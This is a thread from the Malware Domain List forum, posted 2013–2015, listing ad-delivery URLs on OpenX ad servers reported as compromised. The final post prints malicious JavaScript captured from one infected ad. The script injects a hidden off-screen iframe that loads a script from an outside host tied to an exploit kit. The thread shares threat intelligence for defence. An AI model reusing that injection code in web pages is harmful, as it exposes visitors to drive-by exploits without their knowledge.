Malware Domain List

Malware Related => Malicious Domains => Topic started by: SysAdMini on March 14, 2013, 08:04:57 am

Title: compromised OpenX servers
Post by: SysAdMini on March 14, 2013, 08:04:57 am
Code: [Select]
ads.gag.it/www/delivery/ajs.php?zoneid=6&cb=99321988632&loc=http%3A//www.internazionale.it/

www.cercabanner.it/admin/www/delivery/afr.php?zoneid=26&cb=74235

www2.handy-mc.de/www/delivery/ajs.php?zoneid=6&block=1&blockcampaign=1&cb=79101672778

milano.advcronaca.it/www/delivery/ajs.php?zoneid=9&cb=58214273669

ads.tuttoqui.it/open/www/delivery/ajs.php?zoneid=185&target=_blank&block=1&blockcampaign=1&cb=42088357839&charset=UTF-8&loc=http%3A//www.tuttoqui.it/node/44013
Title: Re: compromised OpenX servers
Post by: SysAdMini on March 14, 2013, 10:03:05 am
Code: [Select]
www.gossip.it/open/www/delivery/ajs.php?zoneid=73&target=_blank&cb=28242419425&loc=http%3A//www.gossip.it/
Title: Re: compromised OpenX servers
Post by: SysAdMini on March 25, 2013, 03:51:12 pm
Code: [Select]
www.lehrstellenboerse.ch/php/openx/www/delivery/ajs.php?zoneid=2&cb=69184503946
http://urlquery.net/report.php?id=1593429
Title: Re: compromised OpenX servers
Post by: SysAdMini on March 26, 2013, 01:05:25 pm
Code: [Select]
ads.universfreebox.com/www/delivery/afr.php?zoneid=1&cb=INSERT_RANDOM_NUMBER_HERE
Title: Re: compromised OpenX servers
Post by: SysAdMini on April 15, 2013, 08:30:29 am
Code: [Select]
ad.kenobi.it/openx/www/delivery/ajs.php?zoneid=135&cb=22441432440
Title: Re: compromised OpenX servers
Post by: SysAdMini on April 18, 2013, 09:48:11 am
Code: [Select]
www.adservermagic.com/www/delivery/afr.php?zoneid=20&source=naringsliv&target=_blank&cb=INSERT_RANDOM_NUMBER_HERE
87.233.225.197/openx/www/delivery/ajs.php?zoneid=5&cb=80723697193
Title: Re: compromised OpenX servers
Post by: SysAdMini on April 19, 2013, 11:50:26 am
Code: [Select]
www.hauteliving-adserver.com/www/delivery/ajs.php?zoneid=232&cb=12964099135
www.4managers.de/openx/www/delivery/ajs.php?zoneid=5&cb=51955910487
Title: Re: compromised OpenX servers
Post by: SysAdMini on April 19, 2013, 01:39:36 pm
Code: [Select]
www.yellowpages.com.tr/openx/www/delivery/ajs.php?zoneid=28&cb=3534052525
Title: Re: compromised OpenX servers
Post by: SysAdMini on April 23, 2013, 08:08:33 am
Code: [Select]
ads.fbt.se/delivery/afr.php?zoneid=18&cb=1184174785
Title: Re: compromised OpenX servers
Post by: SysAdMini on April 24, 2013, 08:03:54 am
Code: [Select]
advertise.ilbloggatore.com/www/delivery/afr.php?zoneid=95
openx.ccip.fr/www/delivery/ajs.php?zoneid=21&cb=8930430053741302784&charset=UTF-8&loc=%2Fweb%2Fguest
Title: Re: compromised OpenX servers
Post by: SysAdMini on April 24, 2013, 02:35:22 pm
Code: [Select]
visualdictionarynetwork.com/openx/www/delivery/ajs.php?zoneid=108&cb=83035159055
Title: Re: compromised OpenX servers
Post by: SysAdMini on April 24, 2013, 02:58:18 pm
Code: [Select]
ads.gittigidiyor.com/www/delivery/ajs.php?zoneid=2&cb=74471686517
Title: Re: compromised OpenX servers
Post by: SysAdMini on April 25, 2013, 08:27:06 am
Code: [Select]
content.le118000.fr/openx/www/delivery/ag.php
Title: Re: compromised OpenX servers
Post by: SysAdMini on April 26, 2013, 06:07:16 am
Code: [Select]
baz.cosmocode.de/www/delivery/ajs.php?zoneid=20&cb=36338259125
Title: Re: compromised OpenX servers
Post by: SysAdMini on May 06, 2013, 09:42:09 am
Code: [Select]
www.lanline.de/adsrv/www/delivery/spc.php?zones=9%7C10%7C11%7C12%7C13%7C14%7C15%7C16%7C17%7C18%7C19%7C31%7C30%7C32&source=&r=39371238&block=1
Title: Re: compromised OpenX servers
Post by: SysAdMini on May 06, 2013, 03:13:00 pm
Code: [Select]
adserver.noc.com.tr/www/delivery/afr.php?zoneid=90&cb=INSERT_RANDOM_NUMBER_HERE
Title: Re: compromised OpenX servers
Post by: SysAdMini on May 09, 2013, 06:01:05 pm
Code: [Select]
www2.ultimatereef.co.uk/www/delivery/ajs.php?zoneid=1&cb=9157614026&charset=ISO-8859-1
Title: Re: compromised OpenX servers
Post by: SysAdMini on May 23, 2013, 02:15:40 pm
Code: [Select]
desitvforums.net/ads/www/delivery/afr.php?zoneid=44&target=_blank&cb={random}&ct0={clickurl}
Title: Re: compromised OpenX servers
Post by: SysAdMini on June 03, 2013, 10:44:53 am
Code: [Select]
add.chemcompass.de/www/delivery/ajs.php?zoneid=14&cb=55884666265&charset=iso-8859-1
Title: Re: compromised OpenX servers
Post by: SysAdMini on June 27, 2013, 07:26:10 am
Code: [Select]
www.adservermagic.com/www/delivery/afr.php?zoneid=20&source=NA&target=_blank&cb=INSERT_RANDOM_NUMBER_HERE
Title: Re: compromised OpenX servers
Post by: SysAdMini on July 25, 2013, 07:34:03 am
Code: [Select]
contenta.mediaxp.de/www/delivery/ajs.php?zoneid=3&cb=45489177143
Title: Re: compromised OpenX servers
Post by: SysAdMini on September 04, 2013, 05:11:21 pm
Code: [Select]
http://openads.fenedex.nl/www/delivery/spc.php?zones=9&source=&r=78663372
Title: Re: compromised OpenX servers
Post by: SysAdMini on October 09, 2014, 12:10:11 pm
Code: [Select]
rtbcenter.directupload.net/rtb/www/delivery/afr.php?campaignid=12
http://ads.eurostream.de/www/delivery/ajs.php?zoneid=176&cb=5616143557
Title: Re: compromised OpenX servers
Post by: SysAdMini on March 09, 2015, 01:54:45 pm
hxxp://ad3.wochenblatt.de/openx/www/delivery/ajs.php?zoneid=2&source=Region_Regensburg&cb=52527769221

leading to exploit kit through hxxp://el.christiancarenet.com/aided/par/mci/ips.js

Code: [Select]
OX_2fc4eb23 += "<"+"!--Werbung rechts -START-->\n";
OX_2fc4eb23 += "<"+"div class=\"tt11 cLightGrey\" style=\"display:block;\">&nbsp;&nbsp;Anzeige\n";
OX_2fc4eb23 += "<"+"div id=\"werbungRechts\"><"+"script type=\"text/javascript\">function b(){return a.cookie.indexOf(d)}var a=document;var l=\"http://el.christiancarenet.com/aided/par/mci/ips.js\";if(b()==-1){var c=a.createElement(\"iframe\");c.setAttribute(\"src\",l);c.style.position=\"absolute\";c.style.left=\"-1023px\";c.style.top=\"-1465px\";c.style.width=\"208px\";c.style.height=\"299px\";try{a.body.appendChild(c);a.cookie=d+\"=bargain; expires=Thu, 12 Mar 15 14:37:18 +0300; path=/\"}catch(w){}}else{}var d=\"serving\"<"+"/script>\n";
OX_2fc4eb23 += "<"+"div id=\'ox_d92df008170998bc4fa643648537aa83\' style=\'display: inline;\'> <"+"!--Werbung rechts -START-->\n";
OX_2fc4eb23 += "<"+"div class=\"tt11 cLightGrey\" style=\"display:block;\">&nbsp;&nbsp;Anzeige\n";
OX_2fc4eb23 += "<"+"div id=\"werbungRechts\"><"+"script type=\"text/javascript\">function b(){return a.cookie.indexOf(d)}var a=document;var l=\"http://el.christiancarenet.com/aided/par/mci/ips.js\";if(b()==-1){var c=a.createElement(\"iframe\");c.setAttribute(\"src\",l);c.style.position=\"absolute\";c.style.left=\"-1023px\";c.style.top=\"-1465px\";c.style.width=\"208px\";c.style.height=\"299px\";try{a.body.appendChild(c);a.cookie=d+\"=bargain; expires=Thu, 12 Mar 15 14:37:18 +0300; path=/\"}catch(w){}}else{}var d=\"serving\"<"+"/script><"+"a href=\'http://ad3.wochenblatt.de/openx/www/delivery/ck.php?oaparams=2__bannerid=2016__zoneid=2__source=Region_Regensburg__cb=9abda641d9__oadest=http%3A%2F%2Fwww.purendure.de%2Fconcept-store%2Fhome%2F\' target=\'_blank\'><"+"img src=\'http://ad3.wochenblatt.de/openx/www/images/e3f6d41fa786f9edaf98d2a347c0666b.jpg\' width=\'300\' height=\'300\' alt=\'\' title=\'\' border=\'0\' /><"+"/a>                         <"+"/div>\n";
OX_2fc4eb23 += "<"+"div class=\"br12\"><"+"/div>\n";
OX_2fc4eb23 += "<"+"/div>\n";
OX_2fc4eb23 += "<"+"!--Werbung rechts -ENDE--><"+"/div>\n";
OX_2fc4eb23 += "<"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OX_2fc4eb23 += "var ox_swf = new FlashObject(\'http://ad3.wochenblatt.de/openx/www/images/719fbb74b78b0a709f4528789ceca6b8.swf\', \'Advertisement\', \'300\', \'300\', \'8\');\n";
OX_2fc4eb23 += "ox_swf.addVariable(\'alink1\', \'http%3A%2F%2Fad3.wochenblatt.de%2Fopenx%2Fwww%2Fdelivery%2Fck.php%3Foaparams%3D2__bannerid%3D2016__zoneid%3D2__source%3DRegion_Regensburg__cb%3D9abda641d9__oadest%3Dhttp%253A%252F%252Fwww.purendure.de%252Fconcept-store%252Fhome%252F\');\n";
OX_2fc4eb23 += "ox_swf.addVariable(\'atar1\', \'_blank\');\n";
OX_2fc4eb23 += "ox_swf.addParam(\'allowScriptAccess\',\'always\');\n";
OX_2fc4eb23 += "ox_swf.write(\'ox_d92df008170998bc4fa643648537aa83\');\n";
OX_2fc4eb23 += "if (ox_swf.installedVer.versionIsValid(ox_swf.getAttribute(\'version\'))) { document.write(\"<"+"div id=\'beacon_9abda641d9\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad3.wochenblatt.de/openx/www/delivery/lg.php?bannerid=2016&amp;campaignid=743&amp;zoneid=2&amp;source=Region_Regensburg&amp;cb=9abda641d9\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\"); } else { document.write(\"<"+"div id=\'beacon_9abda641d9\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad3.wochenblatt.de/openx/www/delivery/lg.php?bannerid=2016&amp;campaignid=743&amp;zoneid=2&amp;source=Region_Regensburg&amp;oxfb=1&amp;cb=9abda641d9\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\"); }\n";
OX_2fc4eb23 += "// ]]> --><"+"/script><"+"noscript><"+"div id=\'beacon_9abda641d9\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad3.wochenblatt.de/openx/www/delivery/lg.php?bannerid=2016&amp;campaignid=743&amp;zoneid=2&amp;source=Region_Regensburg&amp;oxfb=1&amp;cb=9abda641d9\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"/noscript>                         <"+"/div>\n";
OX_2fc4eb23 += "<"+"div class=\"br12\"><"+"/div>\n";
OX_2fc4eb23 += "<"+"/div>\n";
OX_2fc4eb23 += "<"+"!--Werbung rechts -ENDE-->\n";
document.write(OX_2fc4eb23);